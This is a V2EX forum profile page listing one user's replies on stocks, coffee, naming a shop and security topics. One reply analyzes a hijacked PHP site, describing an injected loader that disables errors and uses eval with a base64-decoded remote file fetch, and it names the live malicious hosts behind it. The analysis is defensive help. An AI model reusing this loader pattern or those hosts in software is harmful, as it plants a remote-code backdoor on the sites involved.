首页 注册 登录
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX  ›  weirdo  ›  全部回复第 1 页 / 共 5 页
回复总数  81
1  2  3  4  5  
5 天前
回复了 shanhuse 创建的主题 投资 A 股昨天已经是底部了吗?
不懂股票,没事儿的时候会看看支付宝里的大盘指数,
然后上证指数下面有个 主力资金流向,昨天净流入目测有 100 亿左右,今天就变成净流出了,看图估计有 80 多亿。
21 天前
回复了 pauluswanggang 创建的主题 问与答 妹妹要开女装店,征集一个店名。
女装大佬
46 天前
回复了 chunkingName 创建的主题 咖啡 各位大佬喝咖啡有瘾吗?
本人一天 2 杯打底偶尔 3 杯,视情况 挂耳,冷萃,外面咖啡店的美式,持续好些年,身体无任何不适。
咖啡只要不是当水喝,只要自己身体没有人喝不适,就没问题。
最好只喝没多少糖,无糖的美式 或者意式浓缩 就好。
51 天前
回复了 boris1993Jr 创建的主题 程序员 今天在小红书看到个逆天的
提 pr 没意义,骂人也没必要
59 天前
回复了 yougg 创建的主题 信息安全 搜狗输入法 0day,绕过锁屏有手就行
😂 输入法漏洞,好古典的漏洞,以前 win2000 的时候是 Windows 自己的 输入法有问题。现在轮到第三方输入法了
63 天前
回复了 black9 创建的主题 PHP 网站遭劫持了,被注入恶意代码,请教各位大佬如何清除并再次预防?
直观的看网页跳转的问题是在 composer_real.php 里。
正常的文件里是没有 第一行 ini_set 和 eval()这两个操作的。
ini_set 是把报错关了,然后 eval('?>'.file_get_contents(base64_decode('xxxx'))) 这个是在从远程获取 php 代码,根据你图里的 base64 解了下 地址是这个 http://8.jsc20244.com:81/jsc/529kaiwen.txt ,这个 txt 里放着 php 代码,这段代码最后的操作能看到用 curl 访问了另一个地址( http://529.jsc20244.com:81/502.php),这个地址放在浏览器里显示 404 ,在 chrome 里用 f12 伪装成移动端浏览器,就会显示页面,“请使用 手机 设备打开”,可能就是你说的移动端跳转的地址。
至于这个 composer_real.php 文件怎么被搞的,就不知道了,列两个可能性:
1. 用户上传的 php 程序中,composer 被植入了 eval()那坨代码。
2. 你服务器被搞了,然后别人在 composer 里植入了恶意代码,比如通过你说的 pass.php 这样的一句话后门
1  2  3  4  5  
关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2307 人在线   最高记录 6679   ·     Select Language
创意工作者们的社区
World is powered by solitude
VERSION: 3.9.8.5 · 26ms · UTC 11:05 · PVG 19:05 · LAX 04:05 · JFK 07:05
Developed with CodeLauncher
♥ Do have faith in what you're doing.